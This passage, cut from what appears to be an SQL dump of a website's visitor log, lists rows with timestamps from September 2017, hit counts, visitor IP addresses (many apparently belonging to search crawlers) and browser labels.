,1,1,0,0,'46.48.13.161','chrome'),(159831,1506263393,3,3,0,0,'91.209.11.236','other'),(159832,1506263457,1,1,0,0,'51.255.65.97','other'),(159833,1506264389,1,1,0,0,'107.167.106.57','other'),(159834,1506264670,1,1,0,0,'217.182.132.6','other'),(159835,1506264721,1,0,1,0,'66.249.65.125',''),(159836,1506264897,1,1,0,0,'91.209.11.236','other'),(159837,1506265237,1,1,0,0,'5.45.207.9','other'),(159838,1506265714,1,1,0,0,'137.74.207.109','other'),(159839,1506265744,2,2,0,0,'46.48.13.161','chrome'),(159840,1506265892,1,1,0,0,'217.182.132.83','other'),(159841,1506265990,1,1,0,0,'217.182.132.7','other'),(159842,1506266219,1,0,1,0,'68.180.229.52',''),(159843,1506266269,1,1,0,0,'157.55.39.235','other'),(159844,1506266300,1,1,0,0,'51.255.65.16','other'),(159845,1506266727,1,1,0,0,'91.209.11.236','other'),(159846,1506266965,2,2,0,0,'216.244.66.237','other'),(159847,1506267643,1,1,0,0,'5.45.207.9','other'),(159848,1506268195,1,1,0,0,'95.220.96.24','other'),(159849,1506268339,1,1,0,0,'5.45.207.64','other'),(159850,1506268474,1,1,0,0,'217.182.132.33','other'),(159851,1506268541,1,1,0,0,'217.182.132.146','other'),(159852,1506268831,1,1,0,0,'91.196.178.161','other'),(159853,1506268974,1,1,0,0,'8.29.198.26','other'),(159854,1506269155,2,2,0,0,'178.154.171.75','other'),(159855,1506269654,1,1,0,0,'217.182.132.22','other'),(159856,1506269705,3,3,0,0,'216.244.66.237','other'),(159857,1506270493,1,1,0,0,'95.132.5.2','chrome'),(159858,1506270547,1,1,0,0,'217.182.132.88','other'),(159859,1506270646,1,1,0,0,'157.55.39.223','other'),(159860,1506270905,1,1,0,0,'180.76.15.11','other'),(159861,1506270953,1,1,0,0,'217.182.132.71','other'),(159862,1506271078,1,1,0,0,'46.48.13.161','chrome'),(159863,1506271330,1,1,0,0,'51.255.65.17','other'),(159864,1506271533,1,1,0,0,'51.255.71.121','other'),(159865,1506272005,3,3,0,0,'91.209.11.236','other'),(159866,1506272651,1,1,0,0,'5.45.207.64','other'),(159867,1506273065,1,1,0,0,'217.182.132.66','other'),(159868,1506273202,1,1,0,0,'91.196.178.65','chrome'),(159869,1506274224,1,1,0,0,'51.255.65.57','other'),(159870,1506274307,1,0,1,0,'66.249.70.29',''),(159871,1506274617,4,4,0,0,'216.244.66.237','other'),(159872,1506274924,1,1,0,0,'5.45.207.64','other'),(159873,1506275196,1,1,0,0,'217.182.132.88','other'),(159874,1506275367,1,1,0,0,'217.182.132.95','other'),(159875,1506275450,1,1,0,0,'51.255.65.18','other'),(159876,1506275968,1,1,0,0,'217.182.132.34','other'),(159877,1506276229,1,1,0,0,'85.235.59.37','other'),(159878,1506276264,2,2,0,0,'54.165.59.7','other'),(159879,1506276634,1,1,0,0,'51.255.65.44','other'),(159880,1506276745,1,1,0,0,'178.154.171.75','other'),(159881,1506276925,1,1,0,0,'5.45.207.9','other'),(159882,1506277009,2,2,0,0,'216.244.66.237','other'),(159883,1506277356,3,3,0,0,'54.165.59.7','other'),(159884,1506277596,1,1,0,0,'51.255.65.48','other'),(159885,1506277737,1,1,0,0,'137.74.207.119','other'),(159886,1506278250,1,1,0,0,'51.255.65.67','other'),(159887,1506279642,1,1,0,0,'5.45.207.64','other'),(159888,1506279804,1,1,0,0,'8.29.198.27','other'),(159889,1506279959,3,3,0,0,'216.244.66.237','other'),(159890,1506280454,1,1,0,0,'217.182.132.97','other'),(159891,1506281127,1,1,0,0,'217.182.132.148','other'),(159892,1506281593,1,1,0,0,'137.74.207.119','other'),(159893,1506281604,1,1,0,0,'217.182.132.85','other'),(159894,1506281809,1,1,0,0,'178.154.200.35','other'),(159895,1506282445,1,1,0,0,'37.9.113.127','other'),(159896,1506282607,1,1,0,0,'5.45.207.64','other'),(159897,1506283261,1,1,0,0,'217.182.132.179','other'),(159898,1506284687,1,1,0,0,'217.182.132.192','other'),(159899,1506284708,1,1,0,0,'217.69.133.2','other'),(159900,1506285291,1,1,0,0,'217.182.132.37','other'),(159901,1506285338,1,1,0,0,'217.182.132.174','other'),(159902,1506285629,1,1,0,0,'216.244.66.237','other'),(159903,1506286031,2,2,0,0,'5.45.207.64','other'),(159904,1506286395,1,1,0,0,'51.255.65.34','other'),(159905,1506286526,1,1,0,0,'46.211.3.155','other'),(159906,1506286700,1,1,0,0,'40.77.167.54','other'),(159907,1506286736,1,0,1,0,'66.249.70.25',''),(159908,1506287348,1,1,0,0,'217.182.132.170','other'),(159909,1506287789,1,1,0,0,'5.45.207.64','other'),(159910,1506288417,1,1,0,0,'216.244.66.237','other'),(159911,1506288621,1,1,0,0,'217.182.132.95','other'),(159912,1506288768,1,1,0,0,'51.255.71.113','other'),(159913,1506289016,1,1,0,0,'217.182.132.97','other'),(159914,1506289421,2,2,0,0,'5.45.207.64','other'),(159915,1506289654,2,2,0,0,'40.77.167.28','other'),(159916,1506289724,1,1,0,0,'157.55.39.235','other'),(159917,1506289771,1,1,0,0,'217.182.132.22','other'),(159918,1506289843,2,2,0,0,'95.108.213.20','other'),(159919,1506290155,1,1,0,0,'178.154.171.75','other'),(159920,1506290196,1,1,0,0,'51.255.71.119','other'),(159921,1506290564,1,1,0,0,'51.255.65.63','other'),(159922,1506290632,1,1,0,0,'8.29.198.26','other'),(159923,1506291156,1,1,0,0,'40.77.167.54','other'),(159924,1506291521,1,1,0,0,'217.182.132.23','other'),(159925,1506291564,1,1,0,0,'81.1.242.33','other'),(159926,1506292234,1,1,0,0,'51.255.71.129','other'),(159927,1506293152,1,1,0,0,'217.182.132.73','other'),(159928,1506293244,1,1,0,0,'217.182.132.20','other'),(159929,1506293367,1,1,0,0,'137.74.207.116','other'),(159930,1506295088,1,0,1,0,'66.249.70.27',''),(159931,1506296458,1,1,0,0,'51.255.65.51','other'),(159932,1506296459,1,1,0,0,'217.182.132.178','other'),(159933,1506296644,1,1,0,0,'217.182.132.83','other'),(159934,1506296827,1,1,0,0,'5.45.207.9','other'),(159935,1506296950,1,1,0,0,'217.182.132.156','other'),(159936,1506297495,1,1,0,0,'151.80.27.116','other'),(159937,1506298586,1,1,0,0,'5.45.207.9','other'),(159938,1506298946,1,1,0,0,'216.244.66.237','other'),(159939,1506299076,1,1,0,0,'40.77.167.54','other'),(159940,1506299727,1,1,0,0,'51.255.65.52','other'),(159941,1506300179,1,1,0,0,'5.45.207.64','other'),(159942,1506300184,1,1,0,0,'185.80.151.174','opera'),(159943,1506300363,1,1,0,0,'178.154.171.75','other'),(159944,1506300507,1,1,0,0,'40.77.167.28','other'),(159945,1506301461,1,1,0,0,'8.29.198.27','other'),(159946,1506301975,2,2,0,0,'5.45.207.9','other'),(159947,1506302790,1,1,0,0,'5.45.207.64','other'),(159948,1506303367,1,1,0,0,'217.182.132.93','other'),(159949,1506303439,1,0,1,0,'66.249.70.25',''),(159950,1506304268,1,1,0,0,'217.182.132.152','other'),(159951,1506304890,1,1,0,0,'5.45.207.64','other'),(159952,1506305341,1,1,0,0,'5.45.207.9','other'),(159953,1506306503,1,0,1,0,'66.249.70.27',''),(159954,1506306784,1,1,0,0,'51.255.65.29','other'),(159955,1506306871,1,1,0,0,'217.182.132.78','other'),(159956,1506307194,1,1,0,0,'164.132.162.160','other'),(159957,1506307640,1,1,0,0,'51.255.65.35','other'),(159958,1506307845,2,2,0,0,'54.158.248.167','other'),(159959,1506308139,1,0,1,0,'66.249.70.27',''),(159960,1506308150,1,1,0,0,'46.161.9.39','chrome'),(159961,1506308632,1,0,1,0,'66.249.64.8',''),(159962,1506309273,1,1,0,0,'217.69.133.85','other'),(159963,1506309314,1,1,0,0,'217.182.132.186','other'),(159964,1506309576,1,1,0,0,'5.45.207.64','other'),(159965,1506309583,1,1,0,0,'178.154.171.75','other'),(159966,1506309880,1,1,0,0,'217.182.132.54','other'),(159967,1506309891,1,1,0,0,'217.182.132.50','other'),(159968,1506309986,1,1,0,0,'157.55.39.111','other'),(159969,1506310292,1,1,0,0,'5.45.207.9','other'),(159970,1506311548,1,1,0,0,'51.255.71.110','other'),(159971,1506311855,1,1,0,0,'51.255.65.84','other'),(159972,1506311917,1,1,0,0,'217.182.132.34','other'),(159973,1506311945,1,1,0,0,'91.209.11.236','other'),(159974,1506312270,1,1,0,0,'207.46.13.159','other'),(159975,1506312285,1,1,0,0,'8.29.198.26','other'),(159976,1506312553,1,1,0,0,'178.154.171.75','other'),(159977,1506312948,1,0,1,0,'66.249.64.6',''),(159978,1506313248,1,1,0,0,'180.76.15.151','other'),(159979,1506313459,1,1,0,0,'213.160.129.78','firefox'),(159980,1506313892,1,1,0,0,'5.45.207.9','other'),(159981,1506314651,1,1,0,0,'178.154.171.75','other'),(159982,1506314729,1,1,0,0,'91.196.177.46','firefox'),(159983,1506315016,1,1,0,0,'51.255.65.97','other'),(159984,1506316637,1,1,0,0,'91.196.178.72','chrome'),(159985,1506316906,1,0,1,0,'66.249.70.27',''),(159986,1506316915,1,1,0,0,'95.108.213.11','other'),(159987,1506316940,1,1,0,0,'216.244.66.237','other'),(159988,1506317173,1,1,0,0,'5.45.207.64','other'),(159989,1506317227,1,1,0,0,'157.55.39.111','other'),(159990,1506317236,1,1,0,0,'91.196.177.46','chrome'),(159991,1506317696,2,2,0,0,'95.213.141.126','opera'),(159992,1506317760,2,2,0,0,'178.154.171.75','other'),(159993,1506317764,1,1,0,0,'91.196.178.72','chrome'),(159994,1506318095,2,2,0,0,'207.46.13.159','other'),(159995,1506318097,1,1,0,0,'91.196.177.46','firefox'),(159996,1506318404,1,1,0,0,'46.188.32.5','msie'),(159997,1506318724,1,1,0,0,'178.154.171.26','other'),(159998,1506318814,1,1,0,0,'51.255.65.79','other'),(159999,1506319384,1,1,0,0,'5.45.207.9','other'),(160000,1506319405,1,1,0,0,'5.45.207.64','other'),(160001,1506319490,1,1,0,0,'81.1.242.33','other'),(160002,1506319654,1,1,0,0,'193.93.218.148','opera'),(160003,1506319665,1,0,1,0,'66.249.64.6',''),(160004,1506319743,1,1,0,0,'51.255.65.96','other'),(160005,1506320015,1,1,0,0,'91.196.178.66','chrome'),(160006,1506320407,2,2,0,0,'91.209.11.236','other'),(160007,1506320483,1,1,0,0,'91.196.178.70','firefox'),(160008,1506320706,35,35,0,0,'178.238.236.205','other'),(160009,1506320943,1,1,0,0,'5.45.207.64','other'),(160010,1506320965,1,1,0,0,'91.196.178.72','chrome'),(160011,1506320983,1,1,0,0,'217.182.132.74','other'),(160012,1506321871,1,1,0,0,'91.196.178.72','chrome'),(160013,1506322353,1,1,0,0,'178.154.200.35','other'),(160014,1506322881,1,1,0,0,'217.182.132.72','other'),(160015,1506323118,1,1,0,0,'8.29.198.26','other'),(160016,1506323134,1,1,0,0,'5.45.207.64','other'),(160017,1506323580,1,1,0,0,'37.9.113.87','other'),(160018,1506323588,1,1,0,0,'217.182.132.171','other'),(160019,1506323607,1,1,0,0,'217.182.132.147','other'),(160020,1506323657,1,1,0,0,'217.182.132.7','other'),(160021,1506324160,1,1,0,0,'217.182.132.81','other'),(160022,1506324318,1,1,0,0,'66.249.64.6','chrome'),(160023,1506324431,3,3,0,0,'5.45.207.64','other'),(160024,1506324480,1,1,0,0,'66.249.64.13','chrome'),(160025,1506324502,1,1,0,0,'91.196.178.72','chrome'),(160026,1506324560,1,1,0,0,'51.255.65.75','other'),(160027,1506324999,1,1,0,0,'185.182.81.19','chrome'),(160028,1506325487,1,1,0,0,'217.182.132.146','other'),(160029,1506325754,1,1,0,0,'51.255.71.114','other'),(160030,1506325926,1,1,0,0,'137.74.207.170','other'),(160031,1506326124,1,1,0,0,'217.182.132.180','other'),(160032,1506326137,1,1,0,0,'217.182.132.175','other'),(160033,1506327081,1,1,0,0,'91.196.178.72','chrome'),(160034,1506327406,1,1,0,0,'217.182.132.16','other'),(160035,1506327432,1,1,0,0,'5.45.207.9','other'),(160036,1506327484,1,1,0,0,'216.244.66.237','other'),(160037,1506327651,1,1,0,0,'91.196.178.169','chrome'),(160038,1506327685,1,0,1,0,'66.249.64.13',''),(160039,1506327773,1,1,0,0,'37.55.151.103','firefox'),(160040,1506327792,1,1,0,0,'91.219.144.98','firefox'),(160041,1506327805,1,0,1,0,'66.249.70.25',''),(160042,1506327818,1,1,0,0,'51.255.65.57','other'),(160043,1506328455,1,1,0,0,'91.196.178.67','chrome'),(160044,1506328576,1,1,0,0,'217.182.132.22','other'),(160045,1506329009,1,1,0,0,'91.196.178.72','chrome'),(160046,1506329069,1,1,0,0,'5.45.207.64','other'),(160047,1506329118,1,1,0,0,'51.255.65.41','other'),(160048,1506329489,1,1,0,0,'51.255.65.58','other'),(160049,1506329539,1,1,0,0,'217.182.132.71','other'),(160050,1506329775,1,1,0,0,'217.182.132.65','other'),(160051,1506329795,1,1,0,0,'217.182.132.73','other'),(160052,1506329863,1,1,0,0,'178.154.171.9','other'),(160053,1506329996,1,1,0,0,'164.132.162.153','other'),(160054,1506330063,1,0,1,0,'66.249.64.8',''),(160055,1506330154,1,1,0,0,'66.249.64.13','chrome'),(160056,1506330323,1,1,0,0,'91.196.178.72','firefox'),(160057,1506331746,1,1,0,0,'91.196.177.46','firefox'),(160058,1506332056,1,1,0,0,'217.182.132.23','other'),(160059,1506332137,1,1,0,0,'5.45.207.74','other'),(160060,1506332159,1,1,0,0,'141.8.132.34','other'),(160061,1506332180,1,1,0,0,'217.182.132.185','other'),(160062,1506332957,1,1,0,0,'217.182.132.15','other'),(160063,1506333011,1,1,0,0,'217.182.132.186','other'),(160064,1506333085,1,1,0,0,'37.9.113.75','other'),(160065,1506333377,1,1,0,0,'5.45.207.74','other'),(160066,1506333380,1,1,0,0,'95.108.181.122','other'),(160067,1506333478,1,1,0,0,'40.77.167.76','other'),(160068,1506333554,1,1,0,0,'87.250.224.118','other'),(160069,1506333558,1,1,0,0,'141.8.142.91','other'),(160070,1506333948,1,1,0,0,'8.29.198.26','other'),(160071,1506334080,1,0,1,0,'66.249.70.27',''),(160072,1506335112,1,1,0,0,'217.182.132.75','other'),(160073,1506335519,1,1,0,0,'178.154.171.24','other'),(160074,1506335801,1,1,0,0,'164.132.162.160','other'),(160075,1506336011,1,1,0,0,'141.8.142.81','other'),(160076,1506336415,1,1,0,0,'5.255.253.3','other'),(160077,1506336579,1,1,0,0,'199.115.116.48','firefox'),(160078,1506336642,1,1,0,0,'51.255.65.20','other'),(160079,1506336758,1,1,0,0,'51.255.65.65','other'),(160080,1506336905,1,1,0,0,'51.255.65.66','other'),(160081,1506337249,1,1,0,0,'217.182.132.22','other'),(160082,1506337527,1,1,0,0,'51.255.71.128','other'),(160083,1506337769,1,1,0,0,'5.45.207.64','other'),(160084,1506338326,1,1,0,0,'91.196.178.65','opera'),(160085,1506338345,1,1,0,0,'137.74.207.159','other'),(160086,1506338404,1,1,0,0,'91.196.178.70','firefox'),(160087,1506339061,1,1,0,0,'91.196.178.72','chrome'),(160088,1506339118,1,1,0,0,'137.74.207.102','other'),(160089,1506339164,1,1,0,0,'178.137.18.150','chrome'),(160090,1506339217,1,1,0,0,'51.255.65.76','other'),(160091,1506339288,1,1,0,0,'207.46.13.159','other'),(160092,1506339385,2,2,0,0,'91.196.178.70','firefox'),(160093,1506339664,1,1,0,0,'5.45.207.9','other'),(160094,1506340716,1,1,0,0,'217.182.132.59','other'),(160095,1506340886,1,1,0,0,'51.255.65.11','other'),(160096,1506340961,1,1,0,0,'217.182.132.27','other'),(160097,1506341049,2,0,2,0,'66.249.64.13',''),(160098,1506341110,1,1,0,0,'66.102.9.29','chrome'),(160099,1506341577,1,1,0,0,'217.182.132.177','other'),(160100,1506341581,1,1,0,0,'91.196.178.65','opera'),(160101,1506342446,1,1,0,0,'40.77.167.28','other'),(160102,1506342963,1,1,0,0,'137.74.207.109','other'),(160103,1506343137,1,1,0,0,'51.255.65.73','other'),(160104,1506343190,1,1,0,0,'141.8.142.74','other'),(160105,1506343278,1,1,0,0,'91.196.178.70','chrome'),(160106,1506343445,1,1,0,0,'87.250.224.46','other'),(160107,1506344305,2,2,0,0,'178.154.171.88','other'),(160108,1506344764,1,1,0,0,'91.209.11.236','other'),(160109,1506344801,1,1,0,0,'8.29.198.27','other'),(160110,1506345507,1,1,0,0,'77.222.155.89','chrome'),(160111,1506345613,1,1,0,0,'178.154.171.75','other'),(160112,1506346076,1,1,0,0,'40.77.167.50','other'),(160113,1506346823,1,1,0,0,'77.222.155.89','chrome'),(160114,1506347942,1,1,0,0,'95.135.91.148','chrome'),(160115,1506348140,1,1,0,0,'66.249.70.29','chrome'),(160116,1506348177,11,11,0,0,'178.238.227.51','other'),(160117,1506348226,1,1,0,0,'178.154.171.75','other'),(160118,1506348510,1,1,0,0,'40.77.167.50','other'),(160119,1506348697,1,1,0,0,'207.46.13.159','other'),(160120,1506349202,1,1,0,0,'81.177.183.64','opera'),(160121,1506349355,1,1,0,0,'95.108.181.95','other'),(160122,1506349360,1,1,0,0,'141.8.132.34','other'),(160123,1506350286,1,1,0,0,'5.45.207.9','other'),(160124,1506351179,1,1,0,0,'5.45.207.64','other'),(160125,1506351223,1,1,0,0,'92.113.126.242','chrome'),(160126,1506351294,1,1,0,0,'180.76.15.22','other'),(160127,1506352483,2,2,0,0,'91.209.11.236','other'),(160128,1506352664,1,1,0,0,'91.196.178.72','firefox'),(160129,1506353869,2,2,0,0,'54.165.59.7','other'),(160130,1506354239,1,1,0,0,'5.45.207.64','other'),(160131,1506354990,1,1,0,0,'5.45.207.9','other'),(160132,1506355629,1,1,0,0,'8.29.198.26','other'),(160133,1506355889,1,1,0,0,'216.244.66.237','other'),(160134,1506355948,1,1,0,0,'91.196.178.34','chrome'),(160135,1506356569,1,1,0,0,'91.196.178.36','chrome'),(160136,1506357102,1,1,0,0,'5.45.207.64','other'),(160137,1506357287,1,1,0,0,'5.45.207.9','other'),(160138,1506357852,1,1,0,0,'178.92.141.70','opera'),(160139,1506357998,1,1,0,0,'91.209.11.236','other'),(160140,1506358519,1,1,0,0,'216.244.66.237','other'),(160141,1506358893,2,0,2,0,'66.249.66.199',''),(160142,1506359756,1,1,0,0,'178.92.85.5','chrome'),(160143,1506360252,1,1,0,0,'91.196.178.65','chrome'),(160144,1506361037,1,1,0,0,'91.196.178.164','chrome'),(160145,1506361790,1,1,0,0,'185.137.17.36','chrome'),(160146,1506363157,1,0,1,0,'66.249.66.201',''),(160147,1506363186,3,3,0,0,'5.45.207.9','other'),(160148,1506363470,1,1,0,0,'40.77.167.28','other'),(160149,1506363554,1,1,0,0,'162.210.196.130','other'),(160150,1506364054,1,1,0,0,'51.255.65.42','other'),(160151,1506364186,1,1,0,0,'5.45.207.64','other'),(160152,1506364732,1,1,0,0,'217.182.132.155','other'),(160153,1506366035,1,1,0,0,'164.132.162.160','other'),(160154,1506366053,1,1,0,0,'51.255.71.113','other'),(160155,1506366453,1,1,0,0,'8.29.198.25','other'),(160156,1506366558,1,1,0,0,'51.255.65.95','other'),(160157,1506366945,1,1,0,0,'5.45.207.64','other'),(160158,1506367140,1,1,0,0,'66.249.66.199','chrome'),(160159,1506367367,1,1,0,0,'91.209.11.236','other'),(160160,1506367380,1,1,0,0,'51.255.71.112','other'),(160161,1506367400,1,1,0,0,'216.244.66.237','other'),(160162,1506367560,1,1,0,0,'217.182.132.173','other'),(160163,1506367727,1,1,0,0,'51.255.65.3','other'),(160164,1506367846,1,1,0,0,'220.181.132.178','chrome'),(160165,1506367875,1,1,0,0,'106.120.162.108','chrome'),(160166,1506368122,1,1,0,0,'217.182.132.146','other'),(160167,1506368137,1,1,0,0,'137.74.207.101','other'),(160168,1506368818,1,1,0,0,'164.132.162.154','other'),(160169,1506369130,1,1,0,0,'51.255.65.19','other'),(160170,1506369971,1,1,0,0,'5.45.207.9','other'),(160171,1506370053,1,1,0,0,'216.244.66.237','other'),(160172,1506370624,1,1,0,0,'217.182.132.190','other'),(160173,1506370716,1,1,0,0,'107.167.107.181','opera'),(160174,1506370874,1,1,0,0,'217.182.132.91','other'),(160175,1506370898,1,1,0,0,'217.182.132.64','other'),(160176,1506371134,1,1,0,0,'95.108.213.20','other'),(160177,1506371550,1,1,0,0,'5.45.207.9','other'),(160178,1506372086,1,1,0,0,'51.255.65.85','other'),(160179,1506372172,1,0,1,0,'66.249.66.199',''),(160180,1506372190,1,1,0,0,'217.182.132.179','other'),(160181,1506372192,1,1,0,0,'37.9.113.87','other'),(160182,1506372556,1,1,0,0,'217.182.132.94','other'),(160183,1506372744,1,1,0,0,'207.46.13.47','other'),(160184,1506372746,1,1,0,0,'51.255.65.69','other'),(160185,1506372814,2,2,0,0,'5.45.207.9','other'),(160186,1506373089,1,1,0,0,'217.182.132.18','other'),(160187,1506373155,1,1,0,0,'95.108.213.20','other'),(160188,1506373422,1,1,0,0,'5.45.207.64','other'),(160189,1506373446,2,0,2,0,'66.249.66.156',''),(160190,1506373551,1,1,0,0,'51.255.65.64','other'),(160191,1506374043,1,1,0,0,'157.55.39.111','other'),(160192,1506374099,1,0,1,0,'66.249.66.155',''),(160193,1506374226,1,1,0,0,'66.249.66.156','chrome'),(160194,1506374389,1,1,0,0,'91.209.11.236','other'),(160195,1506374956,1,1,0,0,'137.74.203.194','other'),(160196,1506375315,2,2,0,0,'91.209.11.236','other'),(160197,1506375544,1,1,0,0,'5.45.207.64','other'),(160198,1506376631,1,1,0,0,'217.182.132.95','other'),(160199,1506376688,1,1,0,0,'217.182.132.179','other'),(160200,1506377234,1,1,0,0,'178.154.171.75','other'),(160201,1506377283,1,1,0,0,'8.29.198.26','other'),(160202,1506377335,1,1,0,0,'157.55.39.111','other'),(160203,1506377341,1,1,0,0,'51.255.65.14','other'),(160204,1506377926,1,0,1,0,'66.249.66.157',''),(160205,1506378344,1,1,0,0,'176.31.231.10','other'),(160206,1506378362,1,1,0,0,'217.182.132.193','other'),(160207,1506378491,1,1,0,0,'217.182.132.173','other'),(160208,1506378962,1,0,1,0,'66.249.66.157',''),(160209,1506379297,1,1,0,0,'51.255.65.37','other'),(160210,1506379452,1,0,1,0,'68.180.229.52',''),(160211,1506379752,1,1,0,0,'5.45.207.9','other'),(160212,1506379870,1,1,0,0,'51.255.71.133','other'),(160213,1506380385,1,1,0,0,'51.255.65.7','other'),(160214,1506380938,1,1,0,0,'216.244.66.237','other'),(160215,1506381008,1,1,0,0,'51.255.71.115','other'),(160216,1506381384,1,1,0,0,'217.182.132.64','other'),(160217,1506381587,1,0,1,0,'66.249.66.155',''),(160218,1506381590,1,1,0,0,'217.182.132.184','other'),(160219,1506381657,1,1,0,0,'195.238.108.89','firefox'),(160220,1506382087,1,1,0,0,'51.255.65.75','other'),(160221,1506382129,1,1,0,0,'91.209.11.236','other'),(160222,1506382162,1,1,0,0,'207.46.13.159','other'),(160223,1506382425,1,1,0,0,'51.255.65.89','other'),(160224,1506383012,1,1,0,0,'217.182.132.19','other'),(160225,1506383084,1,1,0,0,'137.74.207.159','other'),(160226,1506383152,1,1,0,0,'217.182.132.190','other'),(160227,1506383201,1,0,1,0,'66.249.66.157',''),(160228,1506383320,1,1,0,0,'51.255.65.66','other'),(160229,1506383402,1,1,0,0,'91.209.11.236','other'),(160230,1506383525,1,1,0,0,'37.9.113.160','other'),(160231,1506383862,2,2,0,0,'37.9.113.119','other'),(160232,1506383949,1,1,0,0,'157.55.39.244','other'),(160233,1506384090,1,1,0,0,'5.45.207.64','other'),(160234,1506384265,1,1,0,0,'95.108.213.20','other'),(160235,1506384448,1,1,0,0,'217.182.132.23','other'),(160236,1506384554,1,1,0,0,'178.154.171.28','other'),(160237,1506384730,1,0,1,0,'66.249.66.75',''),(160238,1506384840,1,1,0,0,'141.8.183.5','other'),(160239,1506384844,1,1,0,0,'87.250.224.46','other'),(160240,1506385342,1,1,0,0,'137.74.207.101','other'),(160241,1506385364,1,1,0,0,'164.132.162.187','other'),(160242,1506385677,1,1,0,0,'137.74.207.170','other'),(160243,1506385783,1,1,0,0,'51.255.65.86','other'),(160244,1506386218,1,1,0,0,'217.182.132.171','other'),(160245,1506386280,1,1,0,0,'5.45.207.87','other'),(160246,1506386298,1,1,0,0,'137.74.207.119','other'),(160247,1506386741,1,0,1,0,'66.249.66.155',''),(160248,1506386988,2,2,0,0,'91.209.11.236','other'),(160249,1506387011,1,1,0,0,'141.8.183.15','other'),(160250,1506387056,1,1,0,0,'141.8.132.34','other'),(160251,1506387150,1,1,0,0,'178.154.171.24','other'),(160252,1506387331,1,1,0,0,'213.180.203.65','other'),(160253,1506387349,1,1,0,0,'51.255.65.37','other'),(160254,1506387581,1,1,0,0,'51.255.65.4','other'),(160255,1506387760,1,1,0,0,'217.182.132.22','other'),(160256,1506387866,1,1,0,0,'217.182.132.73','other'),(160257,1506388113,1,1,0,0,'8.29.198.26','other'),(160258,1506388295,1,1,0,0,'178.154.171.9','other'),(160259,1506388438,12,12,0,0,'5.189.157.111','other'),(160260,1506388561,1,1,0,0,'178.154.171.24','other'),(160261,1506388657,1,1,0,0,'217.182.132.66','other'),(160262,1506388876,1,1,0,0,'217.182.132.60','other'),(160263,1506388928,1,1,0,0,'91.209.11.236','other'),(160264,1506388945,1,1,0,0,'141.8.142.90','other'),(160265,1506389309,1,1,0,0,'141.8.132.34','other'),(160266,1506389312,1,1,0,0,'141.8.142.81','other'),(160267,1506389815,1,1,0,0,'217.182.132.77','other'),(160268,1506389908,1,1,0,0,'128.69.217.63','chrome'),(160269,1506390652,1,1,0,0,'217.182.132.65','other'),(160270,1506390736,1,1,0,0,'151.80.27.118','other'),(160271,1506390973,1,1,0,0,'180.76.15.12','other'),(160272,1506391121,2,2,0,0,'91.209.11.236','other'),(160273,1506391194,1,0,1,0,'66.249.66.155',''),(160274,1506391611,1,1,0,0,'95.108.181.97','other'),(160275,1506391673,1,1,0,0,'217.182.132.156','other'),(160276,1506391706,1,1,0,0,'142.4.200.37','other'),(160277,1506391855,1,1,0,0,'37.9.113.127','other'),(160278,1506391872,1,1,0,0,'51.255.65.24','other'),(160279,1506391888,1,1,0,0,'141.8.132.34','other'),(160280,1506391960,1,1,0,0,'137.74.207.116','other'),(160281,1506391966,1,1,0,0,'217.182.132.152','other'),(160282,1506392071,1,1,0,0,'141.8.142.91','other'),(160283,1506392374,1,1,0,0,'217.182.132.5','other'),(160284,1506392892,1,0,1,0,'66.249.66.157',''),(160285,1506393272,1,1,0,0,'51.255.65.53','other'),(160286,1506393407,1,1,0,0,'137.74.207.161','other'),(160287,1506393613,1,1,0,0,'217.182.132.83','other'),(160288,1506395011,1,1,0,0,'51.255.65.72','other'),(160289,1506395040,1,1,0,0,'141.8.142.90','other'),(160290,1506395319,1,0,1,0,'66.249.66.155',''),(160291,1506395326,1,1,0,0,'217.182.132.30','other'),(160292,1506395892,1,1,0,0,'91.209.11.236','other'),(160293,1506396403,1,1,0,0,'217.182.132.18','other'),(160294,1506396441,1,1,0,0,'217.182.132.34','other'),(160295,1506397112,1,1,0,0,'51.255.65.77','other'),(160296,1506397133,1,1,0,0,'51.255.65.20','other'),(160297,1506397765,1,1,0,0,'37.9.113.122','other'),(160298,1506398561,1,1,0,0,'66.249.66.155','chrome'),(160299,1506398616,1,0,1,0,'66.249.66.76',''),(160300,1506398725,1,0,1,0,'66.249.66.156',''),(160301,1506398744,1,1,0,0,'137.74.203.194','other'),(160302,1506398935,1,1,0,0,'8.29.198.25','other'),(160303,1506399780,1,1,0,0,'141.8.142.109','other'),(160304,1506399969,1,0,1,0,'66.249.66.157',''),(160305,1506400083,1,1,0,0,'91.196.177.46','firefox'),(160306,1506400929,1,1,0,0,'157.55.39.111','other'),(160307,1506401084,1,1,0,0,'217.182.132.182','other'),(160308,1506401279,1,1,0,0,'51.255.65.61','other'),(160309,1506401447,1,1,0,0,'178.154.200.39','other'),(160310,1506401513,1,1,0,0,'217.182.132.94','other'),(160311,1506402061,1,1,0,0,'217.182.132.5','other'),(160312,1506403390,1,1,0,0,'66.249.66.75','chrome'),(160313,1506403833,2,2,0,0,'5.45.207.9','other'),(160314,1506404007,1,1,0,0,'217.182.132.6','other'),(160315,1506404022,1,1,0,0,'5.45.207.64','other'),(160316,1506404343,1,1,0,0,'137.74.207.159','other'),(160317,1506404559,1,0,1,0,'66.249.66.157',''),(160318,1506404671,1,1,0,0,'217.182.132.7','other'),(160319,1506404702,1,1,0,0,'217.69.133.4','other'),(160320,1506404801,1,1,0,0,'217.182.132.24','other'),(160321,1506404989,1,1,0,0,'5.45.207.64','other'),(160322,1506405307,1,1,0,0,'217.182.132.181','other'),(160323,1506405346,1,1,0,0,'51.255.65.47','other'),(160324,1506405449,1,1,0,0,'91.196.178.65','firefox'),(160325,1506405545,1,1,0,0,'91.196.178.72','chrome'),(160326,1506405556,1,1,0,0,'37.54.19.138','firefox'),(160327,1506405576,1,1,0,0,'107.167.109.26','opera'),(160328,1506405608,1,1,0,0,'157.55.39.244','other'),(160329,1506406106,1,1,0,0,'37.9.113.87','other'),(160330,1506406365,1,0,1,0,'68.180.229.52',''),(160331,1506406506,1,1,0,0,'216.244.66.237','other'),(160332,1506406581,1,1,0,0,'164.132.162.159','other'),(160333,1506406800,1,1,0,0,'51.255.71.98','other'),(160334,1506407075,1,1,0,0,'5.45.207.64','other'),(160335,1506407335,1,1,0,0,'5.45.207.9','other'),(160336,1506407962,1,1,0,0,'51.255.65.21','other'),(160337,1506408011,52,52,0,0,'158.69.251.119','other'),(160338,1506408762,1,1,0,0,'51.255.65.84','other'),(160339,1506409192,1,1,0,0,'51.255.71.98','other'),(160340,1506409245,1,1,0,0,'51.255.65.12','other'),(160341,1506409451,2,2,0,0,'62.210.251.247','other'),(160342,1506409453,1,1,0,0,'216.244.66.237','other'),(160343,1506409577,2,2,0,0,'5.45.207.64','other'),(160344,1506409761,